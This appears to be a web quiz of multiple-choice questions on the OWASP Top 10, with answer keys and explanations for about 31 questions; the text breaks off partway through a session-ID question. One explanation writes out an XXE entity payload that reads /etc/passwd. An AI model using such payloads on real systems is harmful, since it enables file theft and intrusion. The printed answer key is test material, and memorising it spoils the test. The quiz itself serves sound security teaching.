OWASP Top 10 MCQ 60 Tests With Answers (2026)
PerfectNotes TeamUpdated: May 27, 2026~15 min practice 60 Questions Β· 3 Levels 60 Questions Β· 3 Levels
OWASP Top 10 MCQ practice questions are essential for preparing for competitive exams, cybersecurity certifications (CompTIA Security+, CEH, CISSP), and secure development interviews. This comprehensive testing platform provides 60 carefully curated practice questions covering the entire OWASP Top 10 web application vulnerability framework.
These questions are organized into three progressive difficulty levels of 20 questions each: Basics (covering foundational risk definitions, A01βA10 categories, and the 2017 to 2021 version updates), Concepts (covering vulnerability mechanics, root causes, and primary mitigation strategies), and Advanced (covering scenario-based analysis, exploitation chains like Log4Shell, and complex bypass techniques). Each question includes a verified, in-depth explanation to reinforce learning.
Practice in Study Mode to reveal answers and detailed explanations instantly, or use Exam Mode for timed testing and real-time scoring to simulate certification exam conditions. The interactive engine tracks your progress and identifies knowledge gaps across authorization policy, input parsing, cryptographic protection, and secure infrastructure design.
Contents
- 1.Basics (20 Questions)All 10 categories Β· definitions Β· 2021 vs 2017 changes
- 2.Concepts (20 Questions)Prevention Β· SQLi Β· SSRF Β· supply chain Β· Least Privilege Β· threat modeling
- 3.Advanced (20 Questions)Log4Shell Β· JWT alg:none Β· Blind SQLi Β· Gadget Chains Β· DNS Rebinding Β· OOB XXE
- 4.Conclusionsummary Β· next steps Β· study tips
- 5.Key Takeawaysquick-fire bullet recap of essential facts
- 6.Quick Review Summaryconcept Β· definition Β· key fact table
- 7.FAQcommon questions answered
OWASP Top 10 β Basics
1What does the acronym OWASP stand for?
CorrectC: Open Worldwide Application Security Project
OWASP stands for Open Worldwide Application Security Project β a nonprofit foundation that works to improve software security. "Worldwide" was adopted to reflect its global reach and international community of contributors. OWASP produces free, open-source resources: the OWASP Top 10, ASVS (Application Security Verification Standard), WebGoat, ZAP (Zed Attack Proxy), and the Cheat Sheet Series. Option D ("Open Web Application Security Project") is the older, unofficial version of the name.
IncorrectC: Open Worldwide Application Security Project
OWASP stands for Open Worldwide Application Security Project β a nonprofit foundation that works to improve software security. "Worldwide" was adopted to reflect its global reach and international community of contributors. OWASP produces free, open-source resources: the OWASP Top 10, ASVS (Application Security Verification Standard), WebGoat, ZAP (Zed Attack Proxy), and the Cheat Sheet Series. Option D ("Open Web Application Security Project") is the older, unofficial version of the name.
2What is the primary purpose of the OWASP Top 10 document?
CorrectB: To raise awareness about the most critical security risks to web applications
The OWASP Top 10 is an awareness document β a broad consensus about the most critical security risks to web applications, based on data from hundreds of organizations and security experts worldwide. It is not a standard, a legal regulation, or a certification framework. Its goal is to help developers, architects, and security teams understand, identify, and fix the issues most likely to be exploited in real-world attacks. The document is updated every three to four years to reflect the evolving threat landscape.
IncorrectB: To raise awareness about the most critical security risks to web applications
The OWASP Top 10 is an awareness document β a broad consensus about the most critical security risks to web applications, based on data from hundreds of organizations and security experts worldwide. It is not a standard, a legal regulation, or a certification framework. Its goal is to help developers, architects, and security teams understand, identify, and fix the issues most likely to be exploited in real-world attacks. The document is updated every three to four years to reflect the evolving threat landscape.
3According to the OWASP Top 10 (2021), which vulnerability currently holds the #1 spot?
CorrectD: Broken Access Control
Broken Access Control moved to the #1 position in the 2021 OWASP Top 10, up from #5 in the 2017 edition. It was found in 94% of applications tested. In the 2017 list, Injection held the top spot. Access control enforces policies so that users cannot act outside their intended permissions β failures lead to unauthorized disclosure, modification, or destruction of data. Common examples include IDOR (Insecure Direct Object Reference), missing function-level access control, and privilege escalation.
IncorrectD: Broken Access Control
Broken Access Control moved to the #1 position in the 2021 OWASP Top 10, up from #5 in the 2017 edition. It was found in 94% of applications tested. In the 2017 list, Injection held the top spot. Access control enforces policies so that users cannot act outside their intended permissions β failures lead to unauthorized disclosure, modification, or destruction of data. Common examples include IDOR (Insecure Direct Object Reference), missing function-level access control, and privilege escalation.
4Which of the following best describes an "Injection" flaw?
CorrectA: Untrusted user data is sent to an interpreter as part of a command or query, tricking it into executing unintended commands
Injection flaws (OWASP A03:2021) occur when untrusted, user-supplied data is sent to an interpreter β SQL engine, OS shell, LDAP server, XML parser, or command executor β as part of a command or query. The interpreter cannot distinguish between the intended command and the injected data, executing the attacker's instructions. Common types: SQL Injection, OS Command Injection, LDAP Injection, and XSS (which moved under A03 in 2021). Prevention: use parameterized queries, ORMs, input validation, and output encoding.
IncorrectA: Untrusted user data is sent to an interpreter as part of a command or query, tricking it into executing unintended commands
Injection flaws (OWASP A03:2021) occur when untrusted, user-supplied data is sent to an interpreter β SQL engine, OS shell, LDAP server, XML parser, or command executor β as part of a command or query. The interpreter cannot distinguish between the intended command and the injected data, executing the attacker's instructions. Common types: SQL Injection, OS Command Injection, LDAP Injection, and XSS (which moved under A03 in 2021). Prevention: use parameterized queries, ORMs, input validation, and output encoding.
5The OWASP Top 10 category previously known as "Sensitive Data Exposure" was renamed to better focus on the root cause. What is its current name?
CorrectC: Cryptographic Failures
"Sensitive Data Exposure" was renamed to Cryptographic Failures (A02:2021) to correctly identify the root cause: failures in or absence of cryptography that expose sensitive data. The new name focuses on the issue rather than the symptom. Cryptographic Failures include: transmitting sensitive data over HTTP instead of HTTPS, weak encryption algorithms (MD5, SHA-1, DES, RC4), no encryption at rest, weak key generation, and improper certificate validation. This renaming better guides developers toward fixing the actual cause.
IncorrectC: Cryptographic Failures
"Sensitive Data Exposure" was renamed to Cryptographic Failures (A02:2021) to correctly identify the root cause: failures in or absence of cryptography that expose sensitive data. The new name focuses on the issue rather than the symptom. Cryptographic Failures include: transmitting sensitive data over HTTP instead of HTTPS, weak encryption algorithms (MD5, SHA-1, DES, RC4), no encryption at rest, weak key generation, and improper certificate validation. This renaming better guides developers toward fixing the actual cause.
6What is the main characteristic of "Broken Access Control"?
CorrectB: A user is allowed to act outside of their intended permissions, such as viewing another user's account or accessing admin panels
Broken Access Control (A01:2021) is the failure to properly enforce restrictions on what authenticated users are permitted to do. This allows attackers to: access other users' accounts (IDOR), view sensitive files, modify data they shouldn't be able to modify, escalate privileges (standard user β admin), and browse admin pages. It was found in 94% of applications. Prevention requires: server-side authorization checks on every resource access, deny-by-default access control, and centralized access control mechanisms.
IncorrectB: A user is allowed to act outside of their intended permissions, such as viewing another user's account or accessing admin panels
Broken Access Control (A01:2021) is the failure to properly enforce restrictions on what authenticated users are permitted to do. This allows attackers to: access other users' accounts (IDOR), view sensitive files, modify data they shouldn't be able to modify, escalate privileges (standard user β admin), and browse admin pages. It was found in 94% of applications. Prevention requires: server-side authorization checks on every resource access, deny-by-default access control, and centralized access control mechanisms.
7Which OWASP category emphasizes the risks of failing to update third-party libraries, frameworks, and dependencies?
CorrectB: Vulnerable and Outdated Components
Vulnerable and Outdated Components (A06:2021) β previously "Using Components with Known Vulnerabilities" β covers the risk of using third-party libraries, frameworks, containers, and OS components with known, unpatched CVEs. This is #1 in the Bug Bounty data category. Real-world example: Log4Shell (CVE-2021-44228) exploited the widely-used Log4j logging library. Prevention: maintain a Software Bill of Materials (SBOM), continuously monitor CVE databases, and automate dependency scanning with Dependabot, Snyk, or OWASP Dependency-Check.
IncorrectB: Vulnerable and Outdated Components
Vulnerable and Outdated Components (A06:2021) β previously "Using Components with Known Vulnerabilities" β covers the risk of using third-party libraries, frameworks, containers, and OS components with known, unpatched CVEs. This is #1 in the Bug Bounty data category. Real-world example: Log4Shell (CVE-2021-44228) exploited the widely-used Log4j logging library. Prevention: maintain a Software Bill of Materials (SBOM), continuously monitor CVE databases, and automate dependency scanning with Dependabot, Snyk, or OWASP Dependency-Check.
8What does "SSRF" stand for in the context of the OWASP Top 10?
CorrectA: Server-Side Request Forgery
SSRF stands for Server-Side Request Forgery (A10:2021) β a new addition to the 2021 OWASP Top 10 based on survey data from the security community. SSRF occurs when a web application fetches a remote resource based on a user-supplied URL without adequate validation. Attackers abuse server-side URL fetchers to target internal resources unreachable from outside: cloud metadata services (AWS 169.254.169.254), internal APIs, and databases. The Capital One breach was executed via SSRF against the AWS metadata service.
IncorrectA: Server-Side Request Forgery
SSRF stands for Server-Side Request Forgery (A10:2021) β a new addition to the 2021 OWASP Top 10 based on survey data from the security community. SSRF occurs when a web application fetches a remote resource based on a user-supplied URL without adequate validation. Attackers abuse server-side URL fetchers to target internal resources unreachable from outside: cloud metadata services (AWS 169.254.169.254), internal APIs, and databases. The Capital One breach was executed via SSRF against the AWS metadata service.
9A web application does not log failed login attempts or administrative actions. Which OWASP Top 10 category does this violate?
CorrectC: Security Logging and Monitoring Failures
Security Logging and Monitoring Failures (A09:2021) covers the failure to adequately log security-relevant events and monitor them for signs of attack. Not logging failed logins, missing audit trails for admin actions, and absence of alerting on suspicious patterns all fall here. This failure makes it impossible to detect, investigate, or respond to active attacks and breaches. Average breach detection time without monitoring is 207 days. Controls: centralized log management (SIEM), alerting on anomalies, and incident response runbooks.
IncorrectC: Security Logging and Monitoring Failures
Security Logging and Monitoring Failures (A09:2021) covers the failure to adequately log security-relevant events and monitor them for signs of attack. Not logging failed logins, missing audit trails for admin actions, and absence of alerting on suspicious patterns all fall here. This failure makes it impossible to detect, investigate, or respond to active attacks and breaches. Average breach detection time without monitoring is 207 days. Controls: centralized log management (SIEM), alerting on anomalies, and incident response runbooks.
10Which of the following is a direct result of "Identification and Authentication Failures"?
CorrectC: An attacker bypassing the application's login screen by stealing a static, non-expiring session cookie
Identification and Authentication Failures (A07:2021) β previously "Broken Authentication" β include: weak passwords with no complexity requirements, missing MFA, predictable or non-expiring session tokens, session fixation, and improper session termination on logout. Stealing a static, non-expiring session cookie (e.g., captured via network sniffing on HTTP or XSS) and replaying it to impersonate an authenticated user is a textbook authentication failure. Reading server files (path traversal), XSS injection, and Struts exploitation (A06) are different categories.
IncorrectC: An attacker bypassing the application's login screen by stealing a static, non-expiring session cookie
Identification and Authentication Failures (A07:2021) β previously "Broken Authentication" β include: weak passwords with no complexity requirements, missing MFA, predictable or non-expiring session tokens, session fixation, and improper session termination on logout. Stealing a static, non-expiring session cookie (e.g., captured via network sniffing on HTTP or XSS) and replaying it to impersonate an authenticated user is a textbook authentication failure. Reading server files (path traversal), XSS injection, and Struts exploitation (A06) are different categories.
11What is the core concept behind the "Insecure Design" category (A04:2021)?
CorrectB: Missing or ineffective control design that cannot be fixed by simply writing better code or applying a patch
Insecure Design (A04:2021) is a new 2021 category focused on risks originating from architectural and design flaws β not implementation bugs. The key distinction: a secure design can still have implementation defects (A05, A07), but an insecure design cannot be patched into security β it requires re-architecting. Examples: a password reset flow that uses security questions (fundamentally guessable), a cinema booking system with no bot protection, or multi-step flows with no session binding between steps. Mitigation requires threat modeling, secure design patterns, and reference architectures.
IncorrectB: Missing or ineffective control design that cannot be fixed by simply writing better code or applying a patch
Insecure Design (A04:2021) is a new 2021 category focused on risks originating from architectural and design flaws β not implementation bugs. The key distinction: a secure design can still have implementation defects (A05, A07), but an insecure design cannot be patched into security β it requires re-architecting. Examples: a password reset flow that uses security questions (fundamentally guessable), a cinema booking system with no bot protection, or multi-step flows with no session binding between steps. Mitigation requires threat modeling, secure design patterns, and reference architectures.
12In the context of OWASP A03:2021, what does "Cross-Site Scripting (XSS)" involve?
CorrectB: Injecting malicious client-side scripts into web pages viewed by other users
XSS (Cross-Site Scripting) was merged into the Injection category (A03:2021) in the 2021 update, reflecting its root cause: injecting untrusted data (in this case, JavaScript) into an output context (HTML). An attacker exploits insufficient output encoding to inject malicious scripts into web pages viewed by other users. The injected script runs in the victim's browser under the trusted domain's origin, allowing session token theft, UI manipulation, keylogging, and redirects. XSS types: Reflected, Stored, and DOM-based.
IncorrectB: Injecting malicious client-side scripts into web pages viewed by other users
XSS (Cross-Site Scripting) was merged into the Injection category (A03:2021) in the 2021 update, reflecting its root cause: injecting untrusted data (in this case, JavaScript) into an output context (HTML). An attacker exploits insufficient output encoding to inject malicious scripts into web pages viewed by other users. The injected script runs in the victim's browser under the trusted domain's origin, allowing session token theft, UI manipulation, keylogging, and redirects. XSS types: Reflected, Stored, and DOM-based.
13Which OWASP Top 10 category covers vulnerabilities where cloud environments are deployed with insecure default settings or overly permissive firewall rules?
CorrectC: Security Misconfiguration
Security Misconfiguration (A05:2021) covers any misconfigured application, framework, web server, database, or cloud environment. Common examples: default admin credentials, unnecessary features enabled (e.g., directory listing, sample apps), overly permissive CORS headers, missing security headers, verbose error messages exposing stack traces, and improperly configured cloud storage permissions (public S3 buckets). This category moved up from #6 (2017) to #5 (2021) and is found in 90% of applications tested.
IncorrectC: Security Misconfiguration
Security Misconfiguration (A05:2021) covers any misconfigured application, framework, web server, database, or cloud environment. Common examples: default admin credentials, unnecessary features enabled (e.g., directory listing, sample apps), overly permissive CORS headers, missing security headers, verbose error messages exposing stack traces, and improperly configured cloud storage permissions (public S3 buckets). This category moved up from #6 (2017) to #5 (2021) and is found in 90% of applications tested.
14An attacker registers an account and notices their user ID is 105. They change the URL parameter to id=104 and successfully view another user's profile. This is an example of:
CorrectD: Broken Access Control (specifically IDOR)
This is a textbook IDOR (Insecure Direct Object Reference) β a subcategory of Broken Access Control (A01:2021). The application exposes a direct reference to an internal database object (user ID 104) in a URL parameter, and the server does not verify that the requesting user (ID 105) is authorized to access ID 104's data. Prevention: never use sequential, predictable IDs in externally exposed references; always perform server-side authorization checks verifying the current user owns or has permission to access the specific requested object.
IncorrectD: Broken Access Control (specifically IDOR)
This is a textbook IDOR (Insecure Direct Object Reference) β a subcategory of Broken Access Control (A01:2021). The application exposes a direct reference to an internal database object (user ID 104) in a URL parameter, and the server does not verify that the requesting user (ID 105) is authorized to access ID 104's data. Prevention: never use sequential, predictable IDs in externally exposed references; always perform server-side authorization checks verifying the current user owns or has permission to access the specific requested object.
15Which OWASP category now encompasses the risks associated with CI/CD pipelines, auto-updates without signatures, and insecure deserialization?
CorrectA: Software and Data Integrity Failures
Software and Data Integrity Failures (A08:2021) is a new 2021 category focused on code and infrastructure that does not protect against integrity violations. This includes: insecure deserialization (deserializing untrusted data without validation), CI/CD pipeline security (attackers compromising build pipelines, as in the SolarWinds supply chain attack), auto-update mechanisms without cryptographic signature verification, and dependency confusion attacks. The critical principle: every piece of code executed in production must have its integrity verified.
IncorrectA: Software and Data Integrity Failures
Software and Data Integrity Failures (A08:2021) is a new 2021 category focused on code and infrastructure that does not protect against integrity violations. This includes: insecure deserialization (deserializing untrusted data without validation), CI/CD pipeline security (attackers compromising build pipelines, as in the SolarWinds supply chain attack), auto-update mechanisms without cryptographic signature verification, and dependency confusion attacks. The critical principle: every piece of code executed in production must have its integrity verified.
16If a website stores user passwords in plain text in its backend database, which OWASP category does this directly violate?
CorrectC: Cryptographic Failures
Storing passwords in plaintext is a Cryptographic Failure (A02:2021) β the root cause is the complete absence of cryptographic protection for sensitive data at rest. Even if Identification and Authentication Failures (A07) may benefit from plain-text discovery, the direct category is A02 because the violation is failing to apply a one-way cryptographic hash to passwords. OWASP recommends hashing with Argon2id (winner of the Password Hashing Competition) with a unique per-password salt, or bcrypt/scrypt as alternatives.
IncorrectC: Cryptographic Failures
Storing passwords in plaintext is a Cryptographic Failure (A02:2021) β the root cause is the complete absence of cryptographic protection for sensitive data at rest. Even if Identification and Authentication Failures (A07) may benefit from plain-text discovery, the direct category is A02 because the violation is failing to apply a one-way cryptographic hash to passwords. OWASP recommends hashing with Argon2id (winner of the Password Hashing Competition) with a unique per-password salt, or bcrypt/scrypt as alternatives.
17What is the primary risk associated with "Vulnerable and Outdated Components" (A06:2021)?
CorrectD: Attackers can exploit publicly known vulnerabilities (CVEs) in the unpatched software
Vulnerable and Outdated Components create risk because attackers actively scan target applications to detect which frameworks, libraries, and runtime versions are in use, then cross-reference these against public CVE databases and Exploit-DB. If a known, executable exploit exists for an unpatched component, the attacker has an immediate attack vector β often with published PoC (proof-of-concept) code available. Examples: Equifax breach via unpatched Apache Struts (CVE-2017-5638), Log4Shell via Log4j, and Heartbleed via OpenSSL.
IncorrectD: Attackers can exploit publicly known vulnerabilities (CVEs) in the unpatched software
Vulnerable and Outdated Components create risk because attackers actively scan target applications to detect which frameworks, libraries, and runtime versions are in use, then cross-reference these against public CVE databases and Exploit-DB. If a known, executable exploit exists for an unpatched component, the attacker has an immediate attack vector β often with published PoC (proof-of-concept) code available. Examples: Equifax breach via unpatched Apache Struts (CVE-2017-5638), Log4Shell via Log4j, and Heartbleed via OpenSSL.
18A developer uses an old, deprecated hashing algorithm like SHA-1 for digital signatures. This falls under:
CorrectB: Cryptographic Failures
Using deprecated or weak cryptographic algorithms is a Cryptographic Failure (A02:2021). SHA-1 is considered broken for digital signatures since 2017 (Google's SHAttered collision attack demonstrated a cost-effective SHA-1 collision). Deprecated algorithms: MD5 (collisions trivial), SHA-1 (broken for signatures), DES/3DES (small key size), RC4 (statistical biases), RSA-1024 (insufficient key length). OWASP recommends: AES-256 for symmetric encryption, RSA-4096+ or ECC for asymmetric, SHA-256+ for hashing, TLS 1.3 for transport.
IncorrectB: Cryptographic Failures
Using deprecated or weak cryptographic algorithms is a Cryptographic Failure (A02:2021). SHA-1 is considered broken for digital signatures since 2017 (Google's SHAttered collision attack demonstrated a cost-effective SHA-1 collision). Deprecated algorithms: MD5 (collisions trivial), SHA-1 (broken for signatures), DES/3DES (small key size), RC4 (statistical biases), RSA-1024 (insufficient key length). OWASP recommends: AES-256 for symmetric encryption, RSA-4096+ or ECC for asymmetric, SHA-256+ for hashing, TLS 1.3 for transport.
19Why did OWASP add "Insecure Design" (A04) as a new category in 2021?
CorrectC: To emphasize the need for threat modeling and secure architecture before coding begins, not just patching implemented code
OWASP introduced Insecure Design (A04:2021) to address the industry's over-reliance on fixing code after the fact. The security community recognized a significant gap: many vulnerabilities cannot be addressed by implementation fixes alone β they stem from design decisions that are fundamentally insecure. The solution requires a shift-left approach: incorporating security from the earliest design phase through threat modeling (STRIDE, MITRE ATT&CK), secure design patterns, and reference architectures. "Secure by design" is the goal β not "secure by patching."
IncorrectC: To emphasize the need for threat modeling and secure architecture before coding begins, not just patching implemented code
OWASP introduced Insecure Design (A04:2021) to address the industry's over-reliance on fixing code after the fact. The security community recognized a significant gap: many vulnerabilities cannot be addressed by implementation fixes alone β they stem from design decisions that are fundamentally insecure. The solution requires a shift-left approach: incorporating security from the earliest design phase through threat modeling (STRIDE, MITRE ATT&CK), secure design patterns, and reference architectures. "Secure by design" is the goal β not "secure by patching."
20Which OWASP category covers scenarios where an application fetches a remote resource without validating the user-supplied URL?
CorrectA: Server-Side Request Forgery (SSRF)
Server-Side Request Forgery β SSRF (A10:2021) β is the newest OWASP Top 10 category (added in 2021 based on community survey data). Modern web applications increasingly use URL-fetching functionality: webhooks, URL parsers, PDF generators, server-side image fetchers, and health check systems. When these accept fully-qualified user-supplied URLs without allowlist validation, attackers can forge the server's identity to reach internal services: cloud metadata APIs, localhost admin panels, internal databases, and other services protected by perimeter firewalls.
IncorrectA: Server-Side Request Forgery (SSRF)
Server-Side Request Forgery β SSRF (A10:2021) β is the newest OWASP Top 10 category (added in 2021 based on community survey data). Modern web applications increasingly use URL-fetching functionality: webhooks, URL parsers, PDF generators, server-side image fetchers, and health check systems. When these accept fully-qualified user-supplied URLs without allowlist validation, attackers can forge the server's identity to reach internal services: cloud metadata APIs, localhost admin panels, internal databases, and other services protected by perimeter firewalls.
OWASP Top 10 β Concepts
1What is the most effective and universally recommended defense against SQL Injection (OWASP A03)?
CorrectC: Using Parameterized Queries (Prepared Statements)
Parameterized Queries (Prepared Statements) are the definitive defense against SQL Injection. They separate SQL code from user data at the protocol level β the database treats the parameter value as literal data, not executable SQL syntax, regardless of what characters it contains. WAFs are a useful defense-in-depth layer but cannot be relied upon as the primary defense (they can be bypassed). ORMs built on parameterized queries are equally effective. Never build SQL queries via string concatenation of user input.
IncorrectC: Using Parameterized Queries (Prepared Statements)
Parameterized Queries (Prepared Statements) are the definitive defense against SQL Injection. They separate SQL code from user data at the protocol level β the database treats the parameter value as literal data, not executable SQL syntax, regardless of what characters it contains. WAFs are a useful defense-in-depth layer but cannot be relied upon as the primary defense (they can be bypassed). ORMs built on parameterized queries are equally effective. Never build SQL queries via string concatenation of user input.
2How does implementing "Least Privilege" help mitigate Broken Access Control (A01)?
CorrectC: It ensures users and service accounts are granted only the minimum permissions necessary to perform their jobs, limiting the blast radius of any access control failure
The Principle of Least Privilege is a foundational access control concept that limits each user, process, and service account to only the minimum permissions required to perform its function β nothing more. For Broken Access Control mitigation: even if an authorization check fails (e.g., an IDOR bug), an attacker who gains access can only reach resources that the compromised account was permitted to access. Applied to database accounts: a read-only DB user cannot DROP tables even if SQLi is exploited. Applied to cloud IAM: a compromised EC2 role cannot access unrelated S3 buckets.
IncorrectC: It ensures users and service accounts are granted only the minimum permissions necessary to perform their jobs, limiting the blast radius of any access control failure
The Principle of Least Privilege is a foundational access control concept that limits each user, process, and service account to only the minimum permissions required to perform its function β nothing more. For Broken Access Control mitigation: even if an authorization check fails (e.g., an IDOR bug), an attacker who gains access can only reach resources that the compromised account was permitted to access. Applied to database accounts: a read-only DB user cannot DROP tables even if SQLi is exploited. Applied to cloud IAM: a compromised EC2 role cannot access unrelated S3 buckets.
3Under "Software and Data Integrity Failures" (A08), what is the primary danger of Insecure Deserialization?
CorrectB: Untrusted serialized data is reconstructed into an object without validation, potentially leading to Remote Code Execution (RCE)
Insecure Deserialization (moved from A08:2017 into A08:2021 as Software and Data Integrity Failures) is dangerous because many programming languages use serialization to convert objects to a transmittable format (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter). When an application deserializes data from an untrusted source (cookie, HTTP body, file), an attacker can craft a malicious byte stream that, upon deserialization, chains together existing application classes (a "gadget chain") to achieve Remote Code Execution. Real-world RCE via Java deserialization affected Jenkins, WebLogic, and JBoss.
IncorrectB: Untrusted serialized data is reconstructed into an object without validation, potentially leading to Remote Code Execution (RCE)
Insecure Deserialization (moved from A08:2017 into A08:2021 as Software and Data Integrity Failures) is dangerous because many programming languages use serialization to convert objects to a transmittable format (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter). When an application deserializes data from an untrusted source (cookie, HTTP body, file), an attacker can craft a malicious byte stream that, upon deserialization, chains together existing application classes (a "gadget chain") to achieve Remote Code Execution. Real-world RCE via Java deserialization affected Jenkins, WebLogic, and JBoss.
4Which of the following is the best way to prevent "Identification and Authentication Failures" (A07)?
CorrectD: Implementing Multi-Factor Authentication (MFA) and preventing brute-force attacks via rate limiting and account lockout
MFA is the single most impactful control for authentication security β it renders stolen passwords useless alone. Combined preventive measures for A07: enable MFA (especially for admin and privileged accounts), implement rate limiting and account lockout to defeat brute-force and credential stuffing, use strong password hashing (Argon2id), invalidate session tokens after logout, set short session idle timeouts, regenerate session IDs after login, use secure session management libraries, and check passwords against breached credential lists (e.g., Have I Been Pwned API).
IncorrectD: Implementing Multi-Factor Authentication (MFA) and preventing brute-force attacks via rate limiting and account lockout
MFA is the single most impactful control for authentication security β it renders stolen passwords useless alone. Combined preventive measures for A07: enable MFA (especially for admin and privileged accounts), implement rate limiting and account lockout to defeat brute-force and credential stuffing, use strong password hashing (Argon2id), invalidate session tokens after logout, set short session idle timeouts, regenerate session IDs after login, use secure session management libraries, and check passwords against breached credential lists (e.g., Have I Been Pwned API).
5A developer accidentally leaves an unprotected AWS S3 bucket open to the public, leaking customer data. Which OWASP category does this best represent?
CorrectB: Security Misconfiguration
A publicly accessible AWS S3 bucket (or any unintentionally open cloud storage) is a Security Misconfiguration (A05:2021). This is one of the most common cloud security failures: a developer creates an S3 bucket without understanding that the default policy changed (AWS made buckets private by default in 2018), or they explicitly set the ACL to public. Misconfiguration also includes: open security group ports, default admin passwords, directory listing enabled, and verbose error messages exposing stack traces. Cloud security posture management (CSPM) tools detect these.
IncorrectB: Security Misconfiguration
A publicly accessible AWS S3 bucket (or any unintentionally open cloud storage) is a Security Misconfiguration (A05:2021). This is one of the most common cloud security failures: a developer creates an S3 bucket without understanding that the default policy changed (AWS made buckets private by default in 2018), or they explicitly set the ACL to public. Misconfiguration also includes: open security group ports, default admin passwords, directory listing enabled, and verbose error messages exposing stack traces. Cloud security posture management (CSPM) tools detect these.
6Why are XML External Entities (XXE) vulnerabilities dangerous?
CorrectC: They allow an attacker to interfere with an application's XML processing, leading to disclosure of local files, internal network scanning (SSRF), or Denial of Service
XXE (XML External Entity) Injection falls under Injection (A03:2021) and exploits XML parsers that process external entity declarations (<!ENTITY xxe SYSTEM "file:///etc/passwd">). Impacts: (1) Local file disclosure β reading server files including /etc/shadow and application configuration files containing DB credentials; (2) SSRF β using file:// or http:// to probe internal services; (3) Denial of Service via "Billion Laughs" exponential entity expansion; (4) Remote Code Execution in some legacy parsers. Prevention: disable DTD processing and external entity resolution in all XML parsers.
IncorrectC: They allow an attacker to interfere with an application's XML processing, leading to disclosure of local files, internal network scanning (SSRF), or Denial of Service
XXE (XML External Entity) Injection falls under Injection (A03:2021) and exploits XML parsers that process external entity declarations (<!ENTITY xxe SYSTEM "file:///etc/passwd">). Impacts: (1) Local file disclosure β reading server files including /etc/shadow and application configuration files containing DB credentials; (2) SSRF β using file:// or http:// to probe internal services; (3) Denial of Service via "Billion Laughs" exponential entity expansion; (4) Remote Code Execution in some legacy parsers. Prevention: disable DTD processing and external entity resolution in all XML parsers.
7In the context of OWASP, what does "Threat Modeling" help achieve?
CorrectB: It helps identify and mitigate structural flaws and architectural risks early in the development lifecycle, addressing Insecure Design (A04)
Threat Modeling is the foundational practice required to address Insecure Design (A04:2021). It is a structured activity performed during the design phase where architects, developers, and security engineers systematically identify: What are we building? What can go wrong? (STRIDE: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) What should we do about it? Frameworks: STRIDE (Microsoft), PASTA, VAST, LINDDUN. OWASP recommends threat modeling for every new feature and significant architectural change.
IncorrectB: It helps identify and mitigate structural flaws and architectural risks early in the development lifecycle, addressing Insecure Design (A04)
Threat Modeling is the foundational practice required to address Insecure Design (A04:2021). It is a structured activity performed during the design phase where architects, developers, and security engineers systematically identify: What are we building? What can go wrong? (STRIDE: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) What should we do about it? Frameworks: STRIDE (Microsoft), PASTA, VAST, LINDDUN. OWASP recommends threat modeling for every new feature and significant architectural change.
8Which of the following is an example of an "Identification and Authentication Failure" (A07)?
CorrectB: An application allowing attackers to perform credential stuffing due to a lack of rate limiting on the login page
Credential stuffing β using breached username/password pairs from other sites to attempt logins β succeeds because of password reuse and the absence of rate limiting or bot detection on login endpoints. This is a textbook A07 scenario: the authentication mechanism has no protection against automated attacks. A lack of CSP is A05 (Security Misconfiguration), OS command injection from user input is A03 (Injection), and a public S3 bucket is A05 (Security Misconfiguration). Rate limiting, MFA, and CAPTCHA together defeat credential stuffing.
IncorrectB: An application allowing attackers to perform credential stuffing due to a lack of rate limiting on the login page
Credential stuffing β using breached username/password pairs from other sites to attempt logins β succeeds because of password reuse and the absence of rate limiting or bot detection on login endpoints. This is a textbook A07 scenario: the authentication mechanism has no protection against automated attacks. A lack of CSP is A05 (Security Misconfiguration), OS command injection from user input is A03 (Injection), and a public S3 bucket is A05 (Security Misconfiguration). Rate limiting, MFA, and CAPTCHA together defeat credential stuffing.
9How should an organization defend against Server-Side Request Forgery / SSRF (A10)?
CorrectA: By implementing a "deny by default" network policy and strictly enforcing an allow-list of approved domains the server can fetch from
The primary defense against SSRF is a network-layer and application-layer deny-by-default policy: (1) URL allowlisting β the server should only be permitted to fetch pre-approved, business-necessary external URLs; (2) Network segmentation β the application server should have no direct network access to internal resources that should not be reachable externally; (3) Disable HTTP redirections; (4) For cloud deployments: require IMDSv2 (session-oriented token for AWS metadata), which prevents SSRF exploitation of the metadata service. Client-side validation is trivially bypassed and should never be the primary control.
IncorrectA: By implementing a "deny by default" network policy and strictly enforcing an allow-list of approved domains the server can fetch from
The primary defense against SSRF is a network-layer and application-layer deny-by-default policy: (1) URL allowlisting β the server should only be permitted to fetch pre-approved, business-necessary external URLs; (2) Network segmentation β the application server should have no direct network access to internal resources that should not be reachable externally; (3) Disable HTTP redirections; (4) For cloud deployments: require IMDSv2 (session-oriented token for AWS metadata), which prevents SSRF exploitation of the metadata service. Client-side validation is trivially bypassed and should never be the primary control.
10In the OWASP Top 10 2021 update, which category absorbed "Cross-Site Scripting (XSS)"?
CorrectB: Injection
In the 2021 OWASP Top 10, XSS was consolidated into the Injection category (A03:2021). OWASP made this change because XSS is fundamentally an injection flaw β the attacker injects malicious JavaScript into HTML output context because the application fails to properly encode/sanitize user data before rendering. The 2021 Injection category now covers: SQL Injection, OS Command Injection, LDAP Injection, XSS (HTML/JS injection), XXE injection, and SSTI. In 2017, XSS had its own separate category (A07).
IncorrectB: Injection
In the 2021 OWASP Top 10, XSS was consolidated into the Injection category (A03:2021). OWASP made this change because XSS is fundamentally an injection flaw β the attacker injects malicious JavaScript into HTML output context because the application fails to properly encode/sanitize user data before rendering. The 2021 Injection category now covers: SQL Injection, OS Command Injection, LDAP Injection, XSS (HTML/JS injection), XXE injection, and SSTI. In 2017, XSS had its own separate category (A07).
11A web application uses a predictable, sequential session ID (e.g., Session=1234, Session=1235). What vulnerability does this introduce?
CorrectD: Session Hijacking via predictability β an Identification and Authentication Failure (A07)
Predictable session IDs are a critical Identification and Authentication Failure (A07:2021). If session tokens are sequential integers, an attacker can enumerate or predict other users' valid session IDs and impersonate them β bypassing authentication entirely without knowing their passwords. Session tokens must be: cryptographically random (CSPRNG), at least 128 bits of entropy, non-sequential, non-predictable, and invalidated on logout. Frameworks like Express-Session, Django, and Spring generate cryptographically secure session IDs by default β never implement custom session ID generation.
IncorrectD: Session Hijacking via predictability β an Identification and Authentication Failure (A07)
